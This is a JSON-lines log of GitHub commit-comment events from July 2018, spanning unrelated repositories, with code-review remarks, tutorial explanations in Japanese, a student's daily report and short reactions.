{"id":"8009126455","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29811924,"position":3,"line":3,"path":"js/script.js","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T10:01:42Z","updated_at":"2018-07-24T10:01:42Z","author_association":"CONTRIBUTOR","body":"今回使うAPIの情報やキーは定数として定義します。\r\n一番上に書くことで使うAPIが変更になったときもどこに書いてあるか分かりやすくする狙いがあります。"}},"created_at":"2018-07-24T10:01:42Z"}
{"id":"8009128813","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29811931,"position":10,"line":10,"path":"js/script.js","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T10:02:09Z","updated_at":"2018-07-24T10:02:09Z","author_association":"CONTRIBUTOR","body":"検索ボタンをクリックしたときの処理を書いています。"}},"created_at":"2018-07-24T10:02:09Z"}
{"id":"8009129595","type":"CommitCommentEvent","actor":{"login":"ramidzkh"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29811932,"position":null,"line":null,"path":null,"commit_id":"c5259a8bb1fed4e846f081d540c14595e4fcf962","created_at":"2018-07-24T10:02:17Z","updated_at":"2018-07-24T10:02:17Z","author_association":"COLLABORATOR","body":"~~it wasn't any hard work~~"}},"created_at":"2018-07-24T10:02:17Z"}
{"id":"8009130012","type":"CommitCommentEvent","actor":{"login":"itamar-m"},"repo":{"name":"itamar-m/sample-cloud-native-toolchain-tutorial-20180724091835267"},"payload":{"comment":{"id":29811934,"position":null,"line":null,"path":null,"commit_id":"48ec7bf12551707938f727944232fd4d98ff7afb","created_at":"2018-07-24T10:02:22Z","updated_at":"2018-07-24T10:02:22Z","author_association":"OWNER","body":"tests"}},"created_at":"2018-07-24T10:02:22Z"}
{"id":"8009133646","type":"CommitCommentEvent","actor":{"login":"lackac"},"repo":{"name":"elixir-lang/flow"},"payload":{"comment":{"id":29811942,"position":18,"line":610,"path":"lib/flow.ex","commit_id":"16fecf4bafef60a4d1742d889c28a0abe661cb30","created_at":"2018-07-24T10:03:03Z","updated_at":"2018-07-24T10:03:03Z","author_association":"CONTRIBUTOR","body":"@josevalim ok, I'll send a PR for that later. I have a few other minor changes around wording of warnings and docs."}},"created_at":"2018-07-24T10:03:03Z"}
{"id":"8009135514","type":"CommitCommentEvent","actor":{"login":"raptor-minds"},"repo":{"name":"raptor-minds/xinpi"},"payload":{"comment":{"id":29811946,"position":5,"line":85,"path":"src/main/java/HttpClientHelper.java","commit_id":"ee717a2ade9099061c53d33ef52db00b01c8862b","created_at":"2018-07-24T10:03:23Z","updated_at":"2018-07-24T10:03:23Z","author_association":"OWNER","body":"this is quite useful for the Chinese display unnormal problem"}},"created_at":"2018-07-24T10:03:23Z"}
{"id":"8009139359","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29811955,"position":14,"line":14,"path":"js/script.js","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T10:04:09Z","updated_at":"2018-07-24T10:04:09Z","author_association":"CONTRIBUTOR","body":"Ajaxの処理は関数にしました。\r\n現在の天気情報を取得するので `getCurrentWeather`にしています。\r\n`get`や `set`、 `current`は変数名としてよく使われます。"}},"created_at":"2018-07-24T10:04:09Z"}
{"id":"8009142561","type":"CommitCommentEvent","actor":{"login":"Zengyingsimida"},"repo":{"name":"IMUDGES/Daily_report_2018"},"payload":{"comment":{"id":29811966,"position":null,"line":null,"path":null,"commit_id":"20b29d812b8d82b3170681cb3a9c6b1af1c84b7a","created_at":"2018-07-24T10:04:44Z","updated_at":"2018-07-24T10:04:44Z","author_association":"COLLABORATOR","body":"# IMUDGES 2018暑期开发 日报书\r\n +--------\r\n +-\r\n +-\r\n +-### 基本信息\r\n +-> * 姓名：曾莹\r\n +-> * 学号：0171123129\r\n +-> * 项目组：方言识别\r\n +-\r\n +--------\r\n +-\r\n +-\r\n +-# 2018/07/23\r\n +-\r\n +--------\r\n +-\r\n +-### 今日完成事宜\r\n +-- [x] 学会安卓界面设计\r\n +-\r\n +------\r\n +-### 今日未完成事宜\r\n +--没学会安卓的大部分功能\r\n +-\r\n +-| 事宜     |预期结果| 当前结果  | 未完成原因   | \r\n +-| 界面:    写一个酷炫的界面|难学，没有视频教程 |\r\n +-|    |   |   |   |\r\n +-\r\n +-\r\n +-------\r\n +-### 明日待办事宜\r\n +-- [ ] 学习安卓Studio，完善安卓，势必让我们小组超过游戏组"}},"created_at":"2018-07-24T10:04:44Z"}
{"id":"8009144288","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29811969,"position":70,"line":69,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T10:05:04Z","updated_at":"2018-07-24T10:05:04Z","author_association":"COLLABORATOR","body":"@zaq007 \r\nThat's exactly what I'm talking about."}},"created_at":"2018-07-24T10:05:04Z"}
{"id":"8009144524","type":"CommitCommentEvent","actor":{"login":"artur-beljajev"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":29811971,"position":null,"line":null,"path":null,"commit_id":"77acc004efad07dfd4d4f83be14ef897968a3fd9","created_at":"2018-07-24T10:05:07Z","updated_at":"2018-07-24T10:05:07Z","author_association":"NONE","body":"@maclover7 Any reason why you used `Api` instead of `API`? It introduces an inconsistency with `ActionController::API`."}},"created_at":"2018-07-24T10:05:07Z"}
{"id":"8009152924","type":"CommitCommentEvent","actor":{"login":"yangke1001"},"repo":{"name":"yangke1001/later-big-guy"},"payload":{"comment":{"id":29811993,"position":5,"line":15,"path":"test.html","commit_id":"c89ec0335a2e7c12f35ce9728ac777d25fc10348","created_at":"2018-07-24T10:06:46Z","updated_at":"2018-07-24T10:06:46Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-24T10:06:46Z"}
{"id":"8009154055","type":"CommitCommentEvent","actor":{"login":"TakuyaHarayama"},"repo":{"name":"OITA-CREATIVE-ACADEMY/lesson-04-weather-app"},"payload":{"comment":{"id":29812000,"position":56,"line":56,"path":"js/script.js","commit_id":"674e09c5c110b84b7384cf46a7722dc3b235192b","created_at":"2018-07-24T10:06:58Z","updated_at":"2018-07-24T10:06:58Z","author_association":"CONTRIBUTOR","body":"結果を表示する関数です。\r\nAPIの結果はJSONになっており、JSONには `data['weather']`のような形で値にアクセスすることができます。\r\nAPIの結果や仕様を見て、必要な値がどこにあるか確認しながら進めます。"}},"created_at":"2018-07-24T10:06:58Z"}
{"id":"8009157409","type":"CommitCommentEvent","actor":{"login":"Yasunari15"},"repo":{"name":"Yasunari15/MacTeX-Uninstaller"},"payload":{"comment":{"id":29812006,"position":null,"line":null,"path":null,"commit_id":"086682a29303fc3ab3a48ca761abd049e55cd6c9","created_at":"2018-07-24T10:07:38Z","updated_at":"2018-07-24T10:07:38Z","author_association":"OWNER","body":"@munepi Previewの`Export As ICNS`が上手にできないので，bibunsho7-patchの[Build-icns.sh](https://github.com/munepi/bibunsho7-patch/blob/master/artwork/Build-icns.sh)を使わせて頂きました。これを拡張してRepositoryを作らせて頂いてもよろしいでしょうか。是非，[MacTeX Uninstaller](https://github.com/Yasunari15/MacTeX-Uninstaller)もご覧ください。"}},"created_at":"2018-07-24T10:07:38Z"}
{"id":"8009160733","type":"CommitCommentEvent","actor":{"login":"lindskogen"},"repo":{"name":"cthdidIT/itbio"},"payload":{"comment":{"id":29812013,"position":6,"line":17,"path":"backend/src/main/kotlin/rocks/didit/sefilm/utils/MovieFilterUtil.kt","commit_id":"cfebf8c2488c44183c3c7d6d282a204af24a0183","created_at":"2018-07-24T10:08:19Z","updated_at":"2018-07-24T10:08:19Z","author_association":"CONTRIBUTOR","body":"wtf"}},"created_at":"2018-07-24T10:08:19Z"}
{"id":"8009161186","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/amlogic-e2-procfs"},"payload":{"comment":{"id":29812015,"position":null,"line":null,"path":null,"commit_id":"2b2c5f126cc0f24967616a616eb6c1edb5be89da","created_at":"2018-07-24T10:08:26Z","updated_at":"2018-07-24T10:08:26Z","author_association":"MEMBER","body":"Also we need \"/proc/stb/info/boxtype\" with these values: https://github.com/PLi-metas/extra_rc_models/blob/master/webif/owibranding.py#L549\r\n\r\nEach STB should give us the exact model, is it ok in kxpro?"}},"created_at":"2018-07-24T10:08:26Z"}
{"id":"8009161919","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29812017,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-24T10:08:34Z","updated_at":"2018-07-24T10:08:34Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-24T10:08:34Z"}
{"id":"8009166969","type":"CommitCommentEvent","actor":{"login":"Hideyuki-Yamashita"},"repo":{"name":"ntt-ns/spp"},"payload":{"comment":{"id":29812027,"position":null,"line":null,"path":null,"commit_id":"f8817f8bc08a7862d197484eb5ff94889ebb16c7","created_at":"2018-07-24T10:09:32Z","updated_at":"2018-07-24T10:09:32Z","author_association":"CONTRIBUTOR","body":"確認しました。"}},"created_at":"2018-07-24T10:09:32Z"}
{"id":"8009167540","type":"CommitCommentEvent","actor":{"login":"elketny42"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812028,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T10:09:39Z","updated_at":"2018-07-24T10:09:39Z","author_association":"NONE","body":"great"}},"created_at":"2018-07-24T10:09:39Z"}
{"id":"8009171043","type":"CommitCommentEvent","actor":{"login":"rodrigof100"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812042,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T10:10:19Z","updated_at":"2018-07-24T10:10:19Z","author_association":"NONE","body":"@inwaziaz Agree with you, Very nice project."}},"created_at":"2018-07-24T10:10:19Z"}
{"id":"8009172173","type":"CommitCommentEvent","actor":{"login":"WLitwachi"},"repo":{"name":"WLitwachi/MyDiaryAPI"},"payload":{"comment":{"id":29812043,"position":null,"line":null,"path":null,"commit_id":"b3adf6248d797d9fadbd6285296afe689c34e87c","created_at":"2018-07-24T10:10:32Z","updated_at":"2018-07-24T10:10:32Z","author_association":"OWNER","body":"This gets all the entries in the diary"}},"created_at":"2018-07-24T10:10:32Z"}
{"id":"8009173822","type":"CommitCommentEvent","actor":{"login":"Hideyuki-Yamashita"},"repo":{"name":"ntt-ns/spp"},"payload":{"comment":{"id":29812047,"position":null,"line":null,"path":null,"commit_id":"a9973363150678c9eaacc5b6e916f01b0027212f","created_at":"2018-07-24T10:10:52Z","updated_at":"2018-07-24T10:10:52Z","author_association":"CONTRIBUTOR","body":"確認しました。"}},"created_at":"2018-07-24T10:10:52Z"}
{"id":"8009179940","type":"CommitCommentEvent","actor":{"login":"IlyaFinkelshteyn"},"repo":{"name":"appveyor/website"},"payload":{"comment":{"id":29812079,"position":4,"line":106,"path":"src/docs/build-configuration.md","commit_id":"7efbd134d0b64d22f2673d66f23602e40a2c22ef","created_at":"2018-07-24T10:12:06Z","updated_at":"2018-07-24T10:12:06Z","author_association":"MEMBER","body":"I agree that \"Classic\" is wrong term, but just \"Git\" is also confusing. Can you please rename it to \"Generic git\""}},"created_at":"2018-07-24T10:12:06Z"}
{"id":"8009182371","type":"CommitCommentEvent","actor":{"login":"dervich2675"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812100,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T10:12:33Z","updated_at":"2018-07-24T10:12:33Z","author_association":"NONE","body":"The revenue received during ICO use for the project development is an effective managing and shows to investors more about the project work."}},"created_at":"2018-07-24T10:12:33Z"}
{"id":"8009190262","type":"CommitCommentEvent","actor":{"login":"Klay-Clam"},"repo":{"name":"Klay-Clam/vue-material"},"payload":{"comment":{"id":29812119,"position":null,"line":null,"path":null,"commit_id":"5af181f73ab387c4ff7f02407b835fad98297efe","created_at":"2018-07-24T10:14:05Z","updated_at":"2018-07-24T10:14:05Z","author_association":"OWNER","body":"修改了原生的chip鼠标失去焦点之后，就会创建一个tag"}},"created_at":"2018-07-24T10:14:05Z"}
{"id":"8009192758","type":"CommitCommentEvent","actor":{"login":"euphoria1217"},"repo":{"name":"euphoria1217/Rprogramming-Assignment2"},"payload":{"comment":{"id":29812126,"position":1,"line":1,"path":"Cache Inverse","commit_id":"f1e9642d0e7b27728ecf42db580244b3d6fe2690","created_at":"2018-07-24T10:14:34Z","updated_at":"2018-07-24T10:14:34Z","author_association":"OWNER","body":"\r\n## The first function make a matrix and and the second function calculate if necessary \r\n## the inverse of the matrix and store it \r\n\r\n## The function has four function inside: the first set the matrix, the second get the matrix \r\n## value, the third set the inverse value of the matrix and the last get the inverse value"}},"created_at":"2018-07-24T10:14:34Z"}
{"id":"8009197518","type":"CommitCommentEvent","actor":{"login":"zaq007"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29812137,"position":70,"line":69,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T10:15:30Z","updated_at":"2018-07-24T10:15:30Z","author_association":"COLLABORATOR","body":"@gmltA \r\n.NET Core would be better solution\r\n"}},"created_at":"2018-07-24T10:15:30Z"}
{"id":"8009197899","type":"CommitCommentEvent","actor":{"login":"sangvms"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29812138,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T10:15:34Z","updated_at":"2018-07-24T10:15:34Z","author_association":"NONE","body":"Cool project "}},"created_at":"2018-07-24T10:15:34Z"}
{"id":"8009204184","type":"CommitCommentEvent","actor":{"login":"silkederudder"},"repo":{"name":"silkederudder/portfolio"},"payload":{"comment":{"id":29812156,"position":null,"line":null,"path":null,"commit_id":"f5715464a23d1fb439d33b5ea394e5adada4f929","created_at":"2018-07-24T10:16:50Z","updated_at":"2018-07-24T10:16:50Z","author_association":"OWNER","body":"Also added the HTML code for my favicon."}},"created_at":"2018-07-24T10:16:50Z"}
{"id":"8009206175","type":"CommitCommentEvent","actor":{"login":"dimaep"},"repo":{"name":"Semihalf/marvell-dpdk"},"payload":{"comment":{"id":29812157,"position":145,"line":192,"path":"drivers/net/lport/rte_eth_lport_pmd.c","commit_id":"e1b1140cc264e81890e1340ad8940fb11b847f8c","created_at":"2018-07-24T10:17:14Z","updated_at":"2018-07-24T10:17:14Z","author_association":"NONE","body":"Don't check it per packet.\r\nI think the best way is do it on request (e.g. when get_stats callback is called)\r\nIf it is impossible then move this code outsize of \"for\" loop.\r\nPlease check how it is done in other drivers."}},"created_at":"2018-07-24T10:17:14Z"}
{"id":"8009208121","type":"CommitCommentEvent","actor":{"login":"ZhiLiGod"},"repo":{"name":"ZhiLiGod/GitTest"},"payload":{"comment":{"id":29812158,"position":null,"line":null,"path":null,"commit_id":"fec094337efe4637eba6503c3c3db504bce25fa9","created_at":"2018-07-24T10:17:37Z","updated_at":"2018-07-24T10:17:37Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-24T10:17:37Z"}
{"id":"8009208532","type":"CommitCommentEvent","actor":{"login":"NaveenK1234"},"repo":{"name":"NaveenK1234/Bootstrap"},"payload":{"comment":{"id":29812159,"position":null,"line":null,"path":null,"commit_id":"224b21329f936f937a158982da1d3d3000c5de82","created_at":"2018-07-24T10:17:42Z","updated_at":"2018-07-24T10:17:42Z","author_association":"OWNER","body":"Confusion"}},"created_at":"2018-07-24T10:17:42Z"}
{"id":"8009209412","type":"CommitCommentEvent","actor":{"login":"DawenZeng"},"repo":{"name":"DawenZeng/VideoPlay"},"payload":{"comment":{"id":29812162,"position":3,"line":3,"path":"README.md","commit_id":"b8665ae914791b979691bf1c1f8657e69157ae8d","created_at":"2018-07-24T10:17:52Z","updated_at":"2018-07-24T10:17:52Z","author_association":"OWNER","body":"cfsdfd "}},"created_at":"2018-07-24T10:17:52Z"}
{"id":"8009209869","type":"CommitCommentEvent","actor":{"login":"isubas"},"repo":{"name":"omu/nokul"},"payload":{"comment":{"id":29812163,"position":5,"line":9,"path":"app/models/curriculums/course_share.rb","commit_id":"d7e002e304c83cd9afe9378ecb7944e1fce2741e","created_at":"2018-07-24T10:17:58Z","updated_at":"2018-07-24T10:17:58Z","author_association":"MEMBER","body":"Bir birim kendine ait bir ders tanımladığında bu dersin farklı birimlerde de kullanılmasını sağlamak için ders paylaşım modeli oluşturduk. Bu model bu verilerin tutulmasını sağlıyor.\r\n\r\nBu paylaşım sayesinde ders, farklı bir birimin dersi olsa bile eğer ders oluşturan birim, ilgili birime ders paylaşımı yaptı ise bu birim paylaşılan dersi müfredatına ekleyebilecek.\r\n\r\nÖrneğin;\r\n\r\nMühendislik fakültesi Bilgisayar Mühendisliği bölümü Programa dersi oluşturdu ve bu dersin Makina Mühendisliği bölümünde de okutulmasını ve müfredatlarına eklenmesini isterlerse bu dersi Makina Mühendisliği bölümü ile paylaşabilirler."}},"created_at":"2018-07-24T10:17:58Z"}
{"id":"8009216332","type":"CommitCommentEvent","actor":{"login":"moham96"},"repo":{"name":"PLi-metas/amlogic-e2-procfs"},"payload":{"comment":{"id":29812171,"position":null,"line":null,"path":null,"commit_id":"2b2c5f126cc0f24967616a616eb6c1edb5be89da","created_at":"2018-07-24T10:19:18Z","updated_at":"2018-07-24T10:19:18Z","author_association":"MEMBER","body":"@persianpros well the webif remote works fine, I don't want to change these values until we get enigma2 working with the DVB drivers, because there might be some DVB workarounds in enigma2 that checks for these values.\r\nOf course, you know enigma2 better than me so If you are sure these values are not used elsewhere I can implement boxtype node for each model.\r\n\r\nRegards"}},"created_at":"2018-07-24T10:19:18Z"}
{"id":"8009218198","type":"CommitCommentEvent","actor":{"login":"SheldonTsen"},"repo":{"name":"SheldonTsen/website"},"payload":{"comment":{"id":29812174,"position":1,"line":1,"path":"lipsum.txt","commit_id":"68b0b750611f7ccba7ef4dab2d591f0bd08e475f","created_at":"2018-07-24T10:19:40Z","updated_at":"2018-07-24T10:19:40Z","author_association":"OWNER","body":"# Really??\r\n\r\nSo we __really__ were not able to find *better* `filler` text?"}},"created_at":"2018-07-24T10:19:40Z"}
{"id":"8009219281","type":"CommitCommentEvent","actor":{"login":"zaq007"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29812176,"position":53,"line":55,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T10:19:54Z","updated_at":"2018-07-24T10:19:54Z","author_association":"COLLABORATOR","body":"By the way, I don't think that is must be zero here\r\n`GameNotFound` looks better"}},"created_at":"2018-07-24T10:19:54Z"}
{"id":"8009222464","type":"CommitCommentEvent","actor":{"login":"iopietro"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29812180,"position":null,"line":null,"path":null,"commit_id":"77136a97841afc7697db21e2c2606db86510bbab","created_at":"2018-07-24T10:20:32Z","updated_at":"2018-07-24T10:20:32Z","author_association":"COLLABORATOR","body":"It's strange, I tested it locally and it works with the real artifacts name."}},"created_at":"2018-07-24T10:20:32Z"}
{"id":"8009230131","type":"CommitCommentEvent","actor":{"login":"dkocich"},"repo":{"name":"sriks123/gtfsintegrate"},"payload":{"comment":{"id":29812199,"position":7,"line":372,"path":"gs/static/css/h2.css","commit_id":"6987dfe9b400e73e88de4d0ee89ebf02530e403e","created_at":"2018-07-24T10:22:07Z","updated_at":"2018-07-24T10:22:07Z","author_association":"COLLABORATOR","body":"empty line https://unix.stackexchange.com/questions/18743/whats-the-point-in-adding-a-new-line-to-the-end-of-a-file"}},"created_at":"2018-07-24T10:22:07Z"}
{"id":"8009234702","type":"CommitCommentEvent","actor":{"login":"mirzak"},"repo":{"name":"mirzak/mender"},"payload":{"comment":{"id":29812206,"position":null,"line":null,"path":null,"commit_id":"3349a68d6b851eb006b855fc441150ffefcf751a","created_at":"2018-07-24T10:23:00Z","updated_at":"2018-07-24T10:23:00Z","author_association":"OWNER","body":"Actually I would not like to disable probing, this was just a hack to quickly get the system working.The point of the \"probing\" I believe is a simple sanity check of the system, but it does not work in all cases.\r\n\r\nWhat my suggestion would be is to fallback to bootenv variable in case all the probing fails. I will try and write a proper PR for this today and we can discuss further there."}},"created_at":"2018-07-24T10:23:00Z"}
{"id":"8009235175","type":"CommitCommentEvent","actor":{"login":"danielberndt"},"repo":{"name":"facebook/create-react-app"},"payload":{"comment":{"id":29812208,"position":null,"line":null,"path":null,"commit_id":"d0afe4b3b99b1b0b6ea5b72ccc50a6066c15aac0","created_at":"2018-07-24T10:23:06Z","updated_at":"2018-07-24T10:23:06Z","author_association":"CONTRIBUTOR","body":"I'm not sure if it's this specific commit, but upgrading from 2.0.0-next.66cc7a90 to 2.0.0-next.3e165448 lead to a very hard to debug issue.\r\n\r\nWhen running `yarn build` on circleci I got this error message:\r\n```\r\nCreating an optimized production build...\r\nevents.js:112\r\n      throw er; // Unhandled 'error' event\r\n      ^\r\n\r\nError: write EPIPE\r\n    at _errnoException (util.js:1003:13)\r\n    at WriteWrap.afterWrite [as oncomplete] (net.js:852:14)\r\n```\r\n\r\nAfter some digging I found references to the `thread-loader` in some error log. I know this isn't hard evidence (So I didn't file an issue yet). But it's maybe worth keeping an eye on this."}},"created_at":"2018-07-24T10:23:06Z"}
{"id":"8009239887","type":"CommitCommentEvent","actor":{"login":"matmen"},"repo":{"name":"Tvde1/Selfbot"},"payload":{"comment":{"id":29812212,"position":6,"line":47,"path":"commands/images/hacker.js","commit_id":"17e8b324c3eb7d81bec55b1efa65fe4a9f6c854c","created_at":"2018-07-24T10:23:59Z","updated_at":"2018-07-24T10:23:59Z","author_association":"NONE","body":"hey, matmen#6666 was beaned, better link my github/gitlab"}},"created_at":"2018-07-24T10:23:59Z"}
{"id":"8009240484","type":"CommitCommentEvent","actor":{"login":"leorawe"},"repo":{"name":"rutgers-sci/scicomposer"},"payload":{"comment":{"id":29812216,"position":null,"line":null,"path":null,"commit_id":"f0844747b56fb367910270718f6519e2b940736d","created_at":"2018-07-24T10:24:07Z","updated_at":"2018-07-24T10:24:07Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [scicomposer#pr-37](https://dashboard.pantheon.io/sites/c2ba47eb-fd4a-436b-a2f6-28dc47557ea3#pr-37).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-37-scicomposer.pantheonsite.io/)"}},"created_at":"2018-07-24T10:24:07Z"}
{"id":"8009268719","type":"CommitCommentEvent","actor":{"login":"banu-a"},"repo":{"name":"banu-a/survey-form"},"payload":{"comment":{"id":29812268,"position":null,"line":null,"path":null,"commit_id":"0ae3599f6083c3b585a36fe878456313db340ba5","created_at":"2018-07-24T10:29:56Z","updated_at":"2018-07-24T10:29:56Z","author_association":"OWNER","body":"Survey Form"}},"created_at":"2018-07-24T10:29:56Z"}
{"id":"8009269763","type":"CommitCommentEvent","actor":{"login":"zaq007"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29812271,"position":70,"line":69,"path":"BsuirFind.Foundation/Services/GameService.cs","commit_id":"520cbb750cc4819b3f55e634f4e1283f5a904b26","created_at":"2018-07-24T10:30:10Z","updated_at":"2018-07-24T10:30:10Z","author_association":"COLLABORATOR","body":"Hooli amen\r\nRework it please"}},"created_at":"2018-07-24T10:30:10Z"}
{"id":"8009269811","type":"CommitCommentEvent","actor":{"login":"oleorhagen"},"repo":{"name":"mirzak/mender"},"payload":{"comment":{"id":29812272,"position":null,"line":null,"path":null,"commit_id":"3349a68d6b851eb006b855fc441150ffefcf751a","created_at":"2018-07-24T10:30:10Z","updated_at":"2018-07-24T10:30:10Z","author_association":"NONE","body":":+1: "}},"created_at":"2018-07-24T10:30:10Z"}
{"id":"8009270474","type":"CommitCommentEvent","actor":{"login":"Tvde1"},"repo":{"name":"Tvde1/Selfbot"},"payload":{"comment":{"id":29812275,"position":6,"line":47,"path":"commands/images/hacker.js","commit_id":"17e8b324c3eb7d81bec55b1efa65fe4a9f6c854c","created_at":"2018-07-24T10:30:18Z","updated_at":"2018-07-24T10:30:18Z","author_association":"OWNER","body":"y did u get beaned that's not smart"}},"created_at":"2018-07-24T10:30:18Z"}
{"id":"8009271123","type":"CommitCommentEvent","actor":{"login":"hannahawa"},"repo":{"name":"MISL-EBU-System-SW/mainline-public"},"payload":{"comment":{"id":29812276,"position":null,"line":null,"path":null,"commit_id":"d640c33d7979886da74cb08e6eb19fbcf7d5b57b","created_at":"2018-07-24T10:30:26Z","updated_at":"2018-07-24T10:30:26Z","author_association":"NONE","body":"need to remove the change-ID before pushing it..."}},"created_at":"2018-07-24T10:30:26Z"}
{"id":"8009272141","type":"CommitCommentEvent","actor":{"login":"Tvde1"},"repo":{"name":"Tvde1/Selfbot"},"payload":{"comment":{"id":29812279,"position":6,"line":47,"path":"commands/images/hacker.js","commit_id":"17e8b324c3eb7d81bec55b1efa65fe4a9f6c854c","created_at":"2018-07-24T10:30:38Z","updated_at":"2018-07-24T10:30:38Z","author_association":"OWNER","body":"also make a pr or something I ain't gonna do this myself"}},"created_at":"2018-07-24T10:30:38Z"}
{"id":"8009273514","type":"CommitCommentEvent","actor":{"login":"matmen"},"repo":{"name":"Tvde1/Selfbot"},"payload":{"comment":{"id":29812280,"position":6,"line":47,"path":"commands/images/hacker.js","commit_id":"17e8b324c3eb7d81bec55b1efa65fe4a9f6c854c","created_at":"2018-07-24T10:30:55Z","updated_at":"2018-07-24T10:30:55Z","author_association":"NONE","body":"idk, t&s refuses to tell me"}},"created_at":"2018-07-24T10:30:55Z"}
{"id":"8009275297","type":"CommitCommentEvent","actor":{"login":"mutiaraauliya"},"repo":{"name":"jakeuchre/artikel"},"payload":{"comment":{"id":29812283,"position":3,"line":3,"path":"9 peluang bisnis online dengan modal kecil [infographics].md","commit_id":"f9f4f2a14658f2907473e50763860a9669cb3ab3","created_at":"2018-07-24T10:31:16Z","updated_at":"2018-07-24T10:31:16Z","author_association":"NONE","body":"coba commit"}},"created_at":"2018-07-24T10:31:16Z"}
{"id":"8009279785","type":"CommitCommentEvent","actor":{"login":"agazso"},"repo":{"name":"helmethair-co/go-ethereum"},"payload":{"comment":{"id":29812288,"position":12,"line":307,"path":"cmd/swarm/config.go","commit_id":"68f535c62855b96d8791d781ce1207b9a30f8504","created_at":"2018-07-24T10:32:10Z","updated_at":"2018-07-24T10:32:10Z","author_association":"NONE","body":"This looks like the convention in this file for other bool flags too, so I just followed the style"}},"created_at":"2018-07-24T10:32:10Z"}
{"id":"8009286890","type":"CommitCommentEvent","actor":{"login":"mutiaraauliya"},"repo":{"name":"jakeuchre/artikel"},"payload":{"comment":{"id":29812298,"position":3,"line":3,"path":"9 peluang bisnis online dengan modal kecil [infographics].md","commit_id":"f9f4f2a14658f2907473e50763860a9669cb3ab3","created_at":"2018-07-24T10:33:34Z","updated_at":"2018-07-24T10:33:34Z","author_association":"NONE","body":"Peluang bisnis online sebenarnya sangat banyak tersebar dan beragam. Namun ketika kita ingin memulai bisnis online, mungkin kadang merasa bingung. Jenis atau peluang bisnis online apa yang akan kita jalankan, harus mulai bisnis online dari mana, dan sebagainya."}},"created_at":"2018-07-24T10:33:34Z"}
{"id":"8009287556","type":"CommitCommentEvent","actor":{"login":"Gama11"},"repo":{"name":"HaxeFoundation/HaxeManual"},"payload":{"comment":{"id":29812299,"position":4,"line":159,"path":"HaxeManual/05-expressions.tex","commit_id":"b1a7a1d967aebb62f1d38b93a61393e12c034890","created_at":"2018-07-24T10:33:43Z","updated_at":"2018-07-24T10:33:43Z","author_association":"MEMBER","body":"Missing a `\\` before `tref` here?"}},"created_at":"2018-07-24T10:33:43Z"}
